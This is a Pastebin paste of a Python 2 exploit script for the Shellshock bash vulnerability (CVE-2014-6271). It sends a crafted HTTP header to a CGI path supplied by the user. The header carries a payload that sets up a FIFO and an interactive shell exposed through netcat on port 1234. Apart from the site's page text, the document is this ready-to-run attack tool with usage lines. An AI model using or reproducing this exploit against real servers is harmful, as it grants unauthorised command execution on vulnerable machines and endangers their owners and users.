SHARE
TWEET

Untitled

a guest Sep 24th, 2014 10,653 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. #CVE-2014-6271 cgi-bin reverse shell
  3. #
  4.  
  5. import httplib,urllib,sys
  6.  
  7. if (len(sys.argv)<3):
  8.         print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
  9.         print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
  10.         exit(0)
  11.  
  12. conn = httplib.HTTPConnection(sys.argv[1])
  13. reverse_shell="() { ignored;};/bin/bash -c '/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f'"
  14.  
  15. headers = {"Content-type": "application/x-www-form-urlencoded",
  16.         "test":reverse_shell }
  17. conn.request("GET",sys.argv[2],headers=headers)
  18. res = conn.getresponse()
  19. print res.status, res.reason
  20. data = res.read()
  21. print data
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top